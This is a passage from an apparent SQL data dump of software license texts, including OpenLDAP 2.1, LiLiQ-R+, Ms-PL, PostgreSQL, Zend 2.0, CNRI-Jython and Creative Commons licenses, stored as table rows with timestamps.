a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\nb. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works.\n\n c. For the avoidance of doubt, where the work is a musical composition:\n\ni. Performance Royalties Under Blanket Licenses. Licensor waives the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work.\n\nii. Mechanical Rights and Statutory Royalties. Licensor waives the exclusive\nright to collect, whether individually or via a music rights society or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions).\n\nd. Webcasting Rights and Statutory Royalties. For the avoidance of doubt,\nwhere the Work is a sound recording, Licensor waives the exclusive right to\ncollect, whether individually or via a performance-rights society (e.g. SoundExchange),\nroyalties for the public digital performance (e.g. webcast) of the Work, subject\nto the compulsory license created by 17 USC Section 114 of the US Copyright\nAct (or the equivalent in other jurisdictions).\n\n \n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats,\nbut otherwise you have no rights to make Derivative Works. All rights not\nexpressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested.\n\nb. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or Collective Works, You must keep intact all copyright notices\nfor the Work and give the Original Author credit reasonable to the medium\nor means You are utilizing by conveying the name (or pseudonym if applicable)\nof the Original Author if supplied; the title of the Work if supplied; and\nto the extent reasonably practicable, the Uniform Resource Identifier, if\nany, that Licensor specifies to be associated with the Work, unless such URI\ndoes not refer to the copyright notice or licensing information for the Work.\nSuch credit may be implemented in any reasonable manner; provided, however,\nthat in the case of a Collective Work, at a minimum such credit will appear\nwhere any other comparable authorship credit appears and in a manner at least\nas prominent as such other comparable authorship credit.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT\nLIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR\nPURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY,\nOR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS\nDO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT\nAPPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collective Works from You under this License, however, will\nnot have their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work, the Licensor\noffers to the recipient a license to the Work on the same terms and conditions\nas the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http s ://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(148,'OLDAP-2.1','The OpenLDAP Public License\n\nVersion 2.1, 29 February 2000\n\nCopyright 1999-2000, The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved.\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\nFor written permission, please contact foundation@openldap.org.\n\n4. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation. OpenLDAP is a trademark of the OpenLDAP Foundation.\n\n5. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\n6. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent license\nrevision.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(149,'LiLiQ-Rplus-1.1','Licence Libre du Québec – Réciprocité forte (LiLiQ-R+)\n\nVersion 1.1\n\n 1. Préambule\n\nCette licence s\'applique à tout logiciel distribué dont le titulaire du droit\nd\'auteur précise qu\'il est sujet aux termes de la Licence Libre du Québec\n– Réciprocité forte (LiLiQ-R+) (ci-après appelée la « licence »).\n\n 2. Définitions\n\nDans la présente licence, à moins que le contexte n\'indique un sens différent,\non entend par:\n\n« concédant » : le titulaire du droit d\'auteur sur le logiciel, ou toute personne\ndûment autorisée par ce dernier à accorder la présente licence;\n\n« contributeur » : le titulaire du droit d\'auteur ou toute personne autorisée\npar ce dernier à soumettre au concédant une contribution. Un contributeur\ndont sa contribution est incorporée au logiciel est considéré comme un concédant\nen regard de sa contribution;\n\n« contribution » : tout logiciel original, ou partie de logiciel original\nsoumis et destiné à être incorporé dans le logiciel;\n\n « distribution » : le fait de délivrer une copie du logiciel;\n\n« licencié » : toute personne qui possède une copie du logiciel et qui exerce\nles droits concédés par la licence;\n\n« logiciel » : une œuvre protégée par le droit d\'auteur, telle qu\'un programme\nd\'ordinateur et sa documentation, pour laquelle le titulaire du droit d\'auteur\na précisé qu\'elle est sujette aux termes de la présente licence;\n\n« logiciel dérivé » : tout logiciel original réalisé par un licencié, autre\nque le logiciel ou un logiciel modifié, qui produit ou reproduit la totalité\nou une partie importante du logiciel;\n\n« logiciel modifié » : toute modification par un licencié de l\'un des fichiers\nsource du logiciel ou encore tout nouveau fichier source qui incorpore le\nlogiciel ou une partie importante de ce dernier.\n\n 3. Licence de droit d\'auteur\n\nSous réserve des termes de la licence, le concédant accorde au licencié une\nlicence non exclusive et libre de redevances lui permettant d\'exercer les\ndroits suivants sur le logiciel:\n\n 1 Produire ou reproduire la totalité ou une partie importante;\n\n 2 Exécuter ou représenter la totalité ou une partie importante en public;\n\n 3 Publier la totalité ou une partie importante.\n\n Cette licence est accordée sans limite territoriale et sans limite de temps.\n\nL\'exercice complet de ces droits est sujet à la distribution par le concédant\ndu code source du logiciel, lequel doit être sous une forme permettant d\'y\napporter des modifications. Le concédant peut aussi distribuer le logiciel\naccompagné d\'une offre de distribuer le code source du logiciel, sans frais\nsupplémentaires, autres que ceux raisonnables afin de permettre la livraison\ndu code source. Cette offre doit être valide pendant une durée raisonnable.\n\n 4. Distribution\n\nLe licencié peut distribuer des copies du logiciel, d\'un logiciel modifié\nou dérivé, sous réserve de respecter les conditions suivantes :\n\n 1 Le logiciel doit être accompagné d\'un exemplaire de cette licence;\n\n2 Si le logiciel a été modifié, le licencié doit en faire la mention, de préférence\ndans chacun des fichiers modifiés dont la nature permet une telle mention;\n\n3 Les étiquettes ou mentions faisant état des droits d\'auteur, des marques\nde commerce, des garanties ou de la paternité concernant le logiciel ne doivent\npas être modifiées ou supprimées, à moins que ces étiquettes ou mentions ne\nsoient inapplicables à un logiciel modifié ou dérivé donné.\n\n 4.1. Réciprocité\n\nChaque fois que le licencié distribue le logiciel, le concédant offre au récipiendaire\nune concession sur le logiciel selon les termes de la présente licence. Le\nlicencié doit offrir une concession selon les termes de la présente licence\npour tout logiciel modifié ou dérivé qu\'il distribue.\n\nChaque fois que le licencié distribue le logiciel, un logiciel modifié, ou\nun logiciel dérivé, ce dernier doit assumer l\'obligation d\'en distribuer le\ncode source, de la manière prévue au troisième alinéa de l\'article 3.\n\n 4.2. Compatibilité\n\nDans la mesure où le licencié souhaite distribuer un logiciel modifié ou dérivé\ncombiné à un logiciel assujetti à une licence compatible, mais dont il ne\nserait pas possible d\'en respecter les termes, le concédant offre, en plus\nde la présente concession, une concession selon les termes de cette licence\ncompatible.\n\nUn licencié qui est titulaire exclusif du droit d\'auteur sur le logiciel assujetti\nà une licence compatible ne peut pas se prévaloir de cette offre. Il en est\nde même pour toute autre personne dûment autorisée à sous-licencier par le\ntitulaire exclusif du droit d\'auteur sur le logiciel assujetti à une licence\ncompatible.\n\nEst considérée comme une licence compatible toute licence libre approuvée\nou certifiée par la Free Software Foundation ou l\'Open Source Initiative,\ndont le niveau de réciprocité est comparable à celui de la présente licence,\nsans toutefois être moindre, notamment:\n\n 1 Common Public License Version 1.0 (CPL-1.0)\n\n 2 Contrat de licence de logiciel libre CeCILL, version 2.1 (CECILL-2.1)\n\n 3 Eclipse Public License - v 1.0 (EPL-1.0)\n\n 4 European Union Public License, version 1.1 (EUPL v. 1.1)\n\n 5 GNU General Public License Version 2 (GNU GPLv2)\n\n 6 GNU General Public License Version 3 (GNU GPLv3)\n\n 5. Contributions\n\nSous réserve d\'une entente distincte, toute contribution soumise par un contributeur\nau concédant pour inclusion dans le logiciel sera soumise aux termes de cette\nlicence.\n\n 6. Marques de commerce\n\nLa licence n\'accorde aucune permission particulière qui permettrait d\'utiliser\nles marques de commerce du concédant, autre que celle requise permettant d\'identifier\nla provenance du logiciel.\n\n 7. Garanties\n\nSauf mention contraire, le concédant distribue le logiciel sans aucune garantie,\naux risques et périls de l\'acquéreur de la copie du logiciel, et ce, sans\nassurer que le logiciel puisse répondre à un besoin particulier ou puisse\ndonner un résultat quelconque.\n\nSans lier le concédant d\'une quelconque manière, rien n\'empêche un licencié\nd\'offrir ou d\'exclure des garanties ou du support.\n\n 8. Responsabilité\n\nLe licencié est responsable de tout préjudice résultant de l\'exercice des\ndroits accordés par la licence.\n\nLe concédant ne saurait être tenu responsable du préjudice subi par le licencié\nou par des tiers, pour quelque cause que ce soit en lien avec la licence et\nles droits qui y sont accordés.\n\n 9. Résiliation\n\nLa présente licence est résiliée de plein droit dès que les droits qui y sont\naccordés ne sont pas exercés conformément aux termes qui y sont stipulés.\n\nToutefois, si le défaut est corrigé dans un délai de 30 jours de sa prise\nde connaissance par la personne en défaut, et qu\'il s\'agit du premier défaut,\nla licence est accordée de nouveau.\n\nPour tout défaut subséquent, le consentement exprès du concédant est nécessaire\nafin que la licence soit accordée de nouveau.\n\n 10. Version de la licence\n\nLe Centre de services partagés du Québec, ses ayants cause ou toute personne\nqu\'il désigne, peuvent diffuser des versions révisées ou modifiées de cette\nlicence. Chaque version recevra un numéro unique. Si un logiciel est déjà\nsoumis aux termes d\'une version spécifique, c\'est seulement cette version\nqui liera les parties à la licence.\n\nLe concédant peut aussi choisir de concéder la licence sous la version actuelle\nou toute version ultérieure, auquel cas le licencié peut choisir sous quelle\nversion la licence lui est accordée.\n\n 11. Divers\n\nDans la mesure où le concédant est un ministère, un organisme public ou une\npersonne morale de droit public, créés en vertu d\'une loi de l\'Assemblée nationale\ndu Québec, la licence est régie par le droit applicable au Québec et en cas\nde contestation, les tribunaux du Québec seront seuls compétents.\n\nLa présente licence peut être distribuée sans conditions particulières. Toutefois,\nune version modifiée doit être distribuée sous un nom différent. Toute référence\nau Centre de services partagés du Québec, et, le cas échéant, ses ayant cause,\ndoit être retirée, autre que celle permettant d\'identifier la provenance de\nla licence.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(150,'MS-PL','Microsoft Public License (Ms-PL)\n\nThis license governs use of the accompanying software. If you use the software,\nyou accept this license. If you do not accept the license, do not use the\nsoftware.\n\n 1. Definitions\n\nThe terms \"reproduce,\" \"reproduction,\" \"derivative works,\" and \"distribution\"\nhave the same meaning here as under U.S. copyright law. A \"contribution\" is\nthe original software, or any additions or changes to the software. A \"contributor\"\nis any person that distributes its contribution under this license. \"Licensed\npatents\" are a contributor\'s patent claims that read directly on its contribution.\n\n 2. Grant of Rights\n\n(A) Copyright Grant- Subject to the terms of this license, including the license\nconditions and limitations in section 3, each contributor grants you a non-exclusive,\nworldwide, royalty-free copyright license to reproduce its contribution, prepare\nderivative works of its contribution, and distribute its contribution or any\nderivative works that you create.\n\n(B) Patent Grant- Subject to the terms of this license, including the license\nconditions and limitations in section 3, each contributor grants you a non-exclusive,\nworldwide, royalty-free license under its licensed patents to make, have made,\nuse, sell, offer for sale, import, and/or otherwise dispose of its contribution\nin the software or derivative works of the contribution in the software.\n\n 3. Conditions and Limitations\n\n(A) No Trademark License- This license does not grant you rights to use any\ncontributors\' name, logo, or trademarks.\n\n(B) If you bring a patent claim against any contributor over patents that\nyou claim are infringed by the software, your patent license from such contributor\nto the software ends automatically.\n\n(C) If you distribute any portion of the software, you must retain all copyright,\npatent, trademark, and attribution notices that are present in the software.\n\n(D) If you distribute any portion of the software in source code form, you\nmay do so only under this license by including a complete copy of this license\nwith your distribution. If you distribute any portion of the software in compiled\nor object code form, you may only do so under a license that complies with\nthis license.\n\n(E) The software is licensed \"as-is.\" You bear the risk of using it. The contributors\ngive no express warranties, guarantees, or conditions. You may have additional\nconsumer rights under your local laws which this license cannot change. To\nthe extent permitted under your local laws, the contributors exclude the implied\nwarranties of merchantability, fitness for a particular purpose and non-infringement.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(151,'PostgreSQL','PostgreSQL Database Management System\n\n(formerly known as Postgres, then as Postgres95)\n\nPortions Copyright (c) 1996-2010, The PostgreSQL Global Development Group\n\nPortions Copyright (c) 1994, The Regents of the University of California\n\nPermission to use, copy, modify, and distribute this software and its documentation\nfor any purpose, without fee, and without a written agreement is hereby granted,\nprovided that the above copyright notice and this paragraph and the following\ntwo paragraphs appear in all copies.\n\nIN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR\nDIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING\nLOST PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,\nEVEN IF THE UNIVERSITY OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE.\n\nTHE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN \"AS IS\"\nBASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATIONS TO PROVIDE MAINTENANCE,\nSUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(152,'mif-exception','As a special exception, you may use this file as part of a free software library without restriction. Specifically, if other files instantiate templates or use macros or inline functions from this file, or you compile this file and link it with other files to produce an executable, this file does not by itself cause the resulting executable to be covered by the GNU General Public License. This exception does not however invalidate any other reasons why the executable file might be covered by the GNU General Public License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(153,'dvipdfm','A modified version of this file may be distributed, but it should be distributed\nwith a *different* name. Changed files must be distributed *together with\na complete and unchanged* distribution of these files.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(154,'CNRI-Jython','\n\n1. This LICENSE AGREEMENT is between the Corporation for National Research\nInitiatives, having an office at 1895 Preston White Drive, Reston, VA 20191\n(\"CNRI\"), and the Individual or Organization (\"Licensee\") accessing and using\nJPython version 1.1.x in source or binary form and its associated documentation\nas provided herein (\"Software\").\n\n \n\n2. Subject to the terms and conditions of this License Agreement, CNRI hereby\ngrants Licensee a non-exclusive, non-transferable, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly, prepare\nderivative works, distribute, and otherwise use the Software alone or in any\nderivative version, provided, however, that CNRI\'s License Agreement and CNRI\'s\nnotice of copyright, i.e., \"Copyright (c) 1996-1999 Corporation for National\nResearch Initiatives; All Rights Reserved\" are both retained in the Software,\nalone or in any derivative version prepared by Licensee.\n\nAlternatively, in lieu of CNRI\'s License Agreement, Licensee may substitute\nthe following text (omitting the quotes), provided, however, that such text\nis displayed prominently in the Software alone or in any derivative version\nprepared by Licensee: \"JPython (Version 1.1.x) is made available subject to\nthe terms and conditions in CNRI\'s License Agreement. This Agreement may be\nlocated on the Internet using the following unique, persistent identifier\n(known as a handle): 1895.22/1006. The License may also be obtained from a\nproxy server on the Web using the following URL: http://hdl.handle.net/1895.22/1006.\"\n\n3. In the event Licensee prepares a derivative work that is based on or incorporates\nthe Software or any part thereof, and wants to make the derivative work available\nto the public as provided herein, then Licensee hereby agrees to indicate\nin any such work, in a prominently visible way, the nature of the modifications\nmade to CNRI\'s Software.\n\n4. Licensee may not use CNRI trademarks or trade name, including JPython or\nCNRI, in a trademark sense to endorse or promote products or services of Licensee,\nor any third party. Licensee may use the mark JPython in connection with Licensee\'s\nderivative versions that are based on or incorporate the Software, but only\nin the form \"JPython-based ___________________,\" or equivalent.\n\n5. CNRI is making the Software available to Licensee on an \"AS IS\" basis.\nCNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF\nEXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n6. CNRI SHALL NOT BE LIABLE TO LICENSEE OR OTHER USERS OF THE SOFTWARE FOR\nANY INCIDENTAL, SPECIAL OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING,\nMODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF, EVEN IF\nADVISED OF THE POSSIBILITY THEREOF. SOME STATES DO NOT ALLOW THE LIMITATION\nOR EXCLUSION OF LIABILITY SO THE ABOVE DISCLAIMER MAY NOT APPLY TO LICENSEE.\n\n7. This License Agreement may be terminated by CNRI (i) immediately upon written\nnotice from CNRI of any material breach by the Licensee, if the nature of\nthe breach is such that it cannot be promptly remedied; or (ii) sixty (60)\ndays following notice from CNRI to Licensee of a material remediable breach,\nif Licensee has not remedied such breach within that sixty-day period.\n\n8. This License Agreement shall be governed by and interpreted in all respects\nby the law of the State of Virginia, excluding conflict of law provisions.\nNothing in this Agreement shall be deemed to create any relationship of agency,\npartnership, or joint venture between CNRI and Licensee.\n\n9. By clicking on the \"ACCEPT\" button where indicated, or by installing, copying\nor otherwise using the Software, Licensee agrees to be bound by the terms\nand conditions of this License Agreement.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(155,'Zend-2.0','The Zend Engine License, version 2.00 Copyright (c) 1999-2002 Zend Technologies\nLtd. All rights reserved.\n\n\n\nRedistribution and use in source and binary forms, with or without modification,\nis permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The names \"Zend\" and \"Zend Engine\" must not be used to endorse or promote\nproducts derived from this software without prior permission from Zend Technologies\nLtd. For written permission, please contact license@zend.com.\n\n4. Zend Technologies Ltd. may publish revised and/or new versions of the license\nfrom time to time. Each version will be given a distinguishing version number.\nOnce covered code has been published under a particular version of the license,\nyou may always continue to use it under the terms of that version. You may\nalso choose to use such covered code under the terms of any subsequent version\nof the license published by Zend Technologies Ltd. No one other than Zend\nTechnologies Ltd. has the right to modify the terms applicable to covered\ncode created under this License.\n\n5. Redistributions of any form whatsoever must retain the following acknowledgment:\n\"This product includes the Zend Engine, freely available at http://www.zend.com\"\n\n6. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgment: \"The Zend Engine is freely available\nat http://www.zend.com\"\n\nTHIS SOFTWARE IS PROVIDED BY ZEND TECHNOLOGIES LTD. ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL ZEND TECHNOLOGIES LTD. BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(156,'Bison-exception-2.2','Bison Exception\n\nAs a special exception, you may create a larger work that contains part or all of the Bison parser skeleton and distribute that work under terms of your choice, so long as that work isn\'t itself a parser generator using the skeleton or a modified version thereof as a parser skeleton. Alternatively, if you modify or redistribute the parser skeleton itself, you may (at your option) remove this special exception, which will cause the skeleton and the resulting Bison output files to be licensed under the GNU General Public License without this special exception.\n\nThis special exception was added by the Free Software Foundation in version 2.2 of Bison.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(157,'Newsletr','Copyright 1989--2004 by Hunter Goatley.\n\nPermission is granted to anyone to use this software for any purpose on any\ncomputer system, and to redistribute it freely, subject to the following restrictions:\n\n1. This software is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE.\n\n2. Altered versions must be plainly marked as such, and must not be misrepresented\nas being the original software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(158,'CC-BY-NC-ND-3.0','Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported CREATIVE\nCOMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES.\nDISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP.\nCREATIVE COMMONS PROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS\nMAKES NO WARRANTIES REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY\nFOR DAMAGES RESULTING FROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(f) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined above) for the purposes of this License.\n\nc. \"Distribute\" means to make available to the public the original and copies\nof the Work through sale or other transfer of ownership.\n\nd. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\ne. \"Original Author\" means, in the case of a literary or artistic 